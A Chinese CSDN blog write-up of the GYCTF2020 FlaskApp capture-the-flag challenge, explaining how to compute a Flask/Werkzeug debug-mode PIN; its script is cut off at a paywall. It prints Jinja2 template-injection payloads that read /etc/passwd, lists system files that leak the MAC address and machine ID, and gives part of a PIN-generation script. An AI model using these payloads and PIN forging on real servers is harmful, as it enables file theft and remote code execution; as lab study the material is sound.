Flask debug 模式生成pin码 + [GYCTF2020]FlaskApp

最新推荐文章于 2024-03-04 21:38:21 发布
最新推荐文章于 2024-03-04 21:38:21 发布
阅读量3k 收藏 9
点赞数 1
分类专栏: ctf # web 文章标签: flask python ctf ssti web
不允许转载
本文链接:https://blog.csdn.net/weixin_46081055/article/details/120167680
版权
这篇博客详细介绍了如何在Flask debug模式下生成pin码,涉及的步骤包括获取用户名、modname、app.py路径、MAC地址和机器ID。还讨论了在GYCTF2020的FlaskApp挑战中如何利用这些信息进行 SSTI 攻击,并提供了计算pin码的脚本。同时,文章提到了解密过程中的payload构造和命令执行的两种方法。
摘要由CSDN通过智能技术生成

ssti的payload还是不太会写…

Flask debug 模式生成pin码

计算pin所需要的值为:

1.flask所登录的用户名
2.modname
3.getattr(app, “name”, app.class.name)
4.flask库下app.py的绝对路径
5.当前网络的mac地址的十进制数
6.docker机器id

1.flask所登录的用户名

/etc/passwd 中找到用户名

{
   % for c in [].__class__.__base__.__subclasses__() %}
{
   % if c.__name__=='catch_warnings' %}
{
   {
    c.__init__.__globals__['__builtins__'].open('/etc/passwd','r').read() }}
{
   % endif %}
{
   % endfor %}

也可以

{
  {().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}

2.modname

一般为固定值flask.app


3.getattr(app, '__name__', getattr(app.__class__, '__name__'))

一般为固定值Flask


4.getattr(mod, '__file__', None) app.py的绝对路径

flask目录下的一个app.py的绝对路径 从网站报错信息中可以看到

有人说是要加上pyc,我试的不用


5.uuid.getnode() mac地址

当前网络的mac地址的十进制数

读取文件**/sys/class/net/eth0/address** 或者 /sys/class/net/eth33/address eth0为网卡


6.get_machine_id() 机器id

每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件。


docker机则读取/proc/self/cgroup,其中第一行的/docker/字符串后面的内容作为机器的id


计算pin脚本

大佬写的脚本

#!/usr/bin/python2.7
#coding:utf-8

from sys import *
import requests
import re
from itertools import chain
import hashlib

def genpin(mac,mid):

    probably_public_bits = [
        'ctf',# username
        'flask.app',# modname
        'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
        '/usr/local/lib/python2.7/dist-packages/flask/app.py' # getattr(mod, '__file__', None),
    ]
    mac = "0x"+mac.replace(":","")
    mac = int(mac,16)
    private_bits = [
        str(mac),# str(uuid.getnode()),  /sys/class/net/eth0/address
        str(mid)# get_machine_id(), /proc/sys/kernel/random/boot_id
    ]

    h = hashlib.md5()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode('utf-8')
        h.update(bit)
    h.update(b'cookiesalt')

    num = None
    if num is None:
        h.update(b'pinsalt')
最低0.47元/天 解锁文章
shu天
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Flask个人博客系统(python+mysql)
06-07
Flask实现的个人博客系统,页面简洁美观,主要功能有: 1、系统的登录和注册 2、文章添加、修改、删除、查找 3、博客主页和个人主页 4、文章编辑板 5、系统管理、登录密的修改 里面有具体的使用说明文档,完整的...
flaskpin
weixin_63231007的博客
07-13 3671
python flask-pin介绍 & CTFflask-pin的应用
flaskpin攻击——新版本下pin生成方式
qq_42303523的博客
04-17 4081
在打*CTF的时候,一道明显是flaskpin生成进而RCE的题目卡了半天,最后发现是新版本的flaskpin生成方式有了一定的改变,这里做一下记录。 我们常用的生成pin的脚本如下: import hashlib from itertools import chain probably_public_bits = [ 'root',# username 'flask.app',# modname 'Flask',# getattr(app, '__name__', get
关于ctfflaskpin总结
arcuied
02-20 4629
flask pin的相关问题
2021-02-23
m0_53314778的博客
02-23 370
[GYCTF2020]FlaskApp 知识点 Flask模板注入中debug模式pin的获取和利用 Pin (代识别debug模式,为什么assert()在debug模式下才有用? ssti的绕过(拼接字符串,倒序切片,内置对象、函数) WP: 前言:Flask开启debug模式等于给黑客留了后门 参考链接:Flask开启debug模式 Flask在生产环境中开启debug模式是一件非常危险的事,主要有3点原因: 1、会泄露当前报错页面的源,可供审计挖掘其他漏洞 2、会泄露W
python全栈开发项目模板Flask+Flask-Login+SQLAlchemy+WTForms+PyMySQL架构Demo
06-23
python全栈开发项目模板Flask+Flask-Login+SQLAlchemy+WTForms+PyMySQL架构Demo。用于快速构建自己的python全栈web应用。简单实用,代已调试,完美运行! python全栈开发项目模板Flask+Flask-Login+SQLAlchemy+...
python + flask + LayUI + mysql 网站模板.zip
05-14
python + flask + LayUI + mysql 网站模板 python + flask + LayUI + mysql 网站模板 python + flask + LayUI + mysql 网站模板 python + flask + LayUI + mysql 网站模板 ...
Python优秀项目 基于Flask实现的动漫App+部署文档+数据资料.zip
最新发布
05-25
Python优秀项目 基于Flask实现的动漫App+部署文档+数据资料.zip 1、代压缩包内容 代的项目文件 部署文档文件 2、代运行版本 python3.7或者3.7以上的版本;若运行有误,根据提示GPT修改;若不会,私信博主...
Python + Flask + PyEcharts +plotly+seaborn 的自动数据可视化平台
02-16
标题中的“Python + Flask + PyEcharts +plotly+seaborn 的自动数据可视化平台”指的是一项利用Python编程语言,结合Flask框架、PyEcharts、Plotly和Seaborn库来创建一个自动化数据可视化的项目。这个平台能够帮助...
CTF赛题分析之 Flask 目录穿越
程序员阿飘 的博客
01-09 1071
最近身边有萌新想打ctf,我作为一个曾经接触过一点点ctf的业余菜鸡,就索性做了一道Web题。这篇文章主要是面向想开始打ctf的萌新,所以很多地方可能都比较简单。如有错误之处,欢迎各位指正。Flask库是一个非常小型的Python Web开发框架。它有两个主要依赖:路由、调试和 Web 服务器网关接口(Web Server Gateway Interface,WSGI)子系统由 Werkzeug(werkzeug.pocoo.org/)提供;模板系统由Jinja2(jinja.pocoo.org/)提供。
buuctf_练[GYCTF2020]FlaskApp
m0_66225311的博客
10-26 727
`ssti`的`python debug`的`PIN`,调用`debug`命令行执行命令。存在`ssti`注入就能进行命令执行,使用拼接操作绕过关键字过滤`['o'+'s']`。不同版本的`python`计pin的代不同。`python`的模板注入可以通过for循环遍历子类特征名的方式,来寻找能够执行命令的子类模块
[ctfshow web入门]常用姿势801-806
weixin_45751765的博客
04-14 4296
php单引号和双引号包裹的区别
BUUCTF-[GYCTF2020]FlaskApp flask爆破pin
m0_64180167的博客
12-07 803
这道题不需要爆破也可以getshellssti都给你了但是学习记录一下pin的获取首先就是通过base加密后 当base64解密的时候 会造成ssfr这里过滤了 * 所以使用 {{7+7}} 实现然后我们开始看看源代可以发现HINT 下存在pin所以是找pin这里我们开始在解密随便输入内容报错了 然后我们可以看源代这里可以发现没啥内容 但是有waf首先通过读取读取一下/etc/passwd。
Python-flask库开启debug调试导致PIN破解泄露getshell】
giaogiaohuohua的博客
01-25 1523
2、这里又有一个坑点,配置好了python之后呢,既然是破解PIN,肯定是需要安装flask,然后看看对应版本中PIN法,这里直接使用pip安装会报错,pip会说版本太低了,要先升级,升级完成之后就会报错如下。注:flask在遇到报错时,如果开启了debug模式,就可以在web上建立一个交互式shell进行python调试,但是需要PINPIN是可以破解的。4、得到全部参数后,运行脚本,将得到的PIN输入到,即可开启debug调试模式。注:不同的python版本,1、python的版本。
每周练手-[NewStarCTF 2023 公开赛道]pppython?
qq_60905276的博客
03-04 1179
如果相等,就会发送一个HTTP响应头,并执行系统命令 "ls / -la" 来列出根目录的文件,之后退出。url=file:///sys/class/net/eth0/address&lolita[]=机器分为两个部分,我们可以先读取/etc/machine-id,然后再接上/proc/self/cgroup。/proc/self/cgroup 只读取第一行,并以从右边起的第一个。pin生成可以看看这个大佬说的。
Werkzeug更新带来的Flask debug pin生成方式改变
BlusKing
07-06 1278
前言: 首发在Freebuf:https://www.freebuf.com/articles/network/238485.html于2020.4月成稿,时隔3个月被发布,内容为flask debug pin构造方式的改变。 正文: 复现2020GYCTF-FLASKAPP及 2019CISCN double_secret出现异常。题目本身有两个解题方式。其中一个思路是: 当Flask开启debug模式时,可以在报错页面输入pin来执行python命令。 ...
浅谈flaskctf那些事
蚁景网安学院
08-21 2525
最近跑了培训写了点flask的session伪造,没能用上,刚好整理了一下先前的资料把flask三种考过的点拿出来写写文章。debug pin本地先起一个开启debug模式的服务:# -...
[GYCTF2020]FlaskApp--Flask Debug PIN
Mrs_H的博客
12-01 1485
[GYCTF2020]FlaskApp 一.前言 已经很久没有写文章了,最近快要到期末了,事情一天比一天多,没有时间做靶场的题目了。这篇文章想写很久了,事实上在一周前就已经用PIN的方式做出来了这道题,但是一直没有时间来整理,今天下课来到图书馆翻开自己的截图记录就想着把它写出来了。 二.正文 首先,打开题目,来看这个页面 ...
flask debug模式
05-25
Flask中,启用Debug模式可以帮助开发人员更方便地进行调试和开发。具体方法如下: 1. 在应用程序中设置DEBUG配置项为True,例如: ``` app = Flask(__name__) app.config['DEBUG'] = True ``` 2. 在命令行中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shu天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值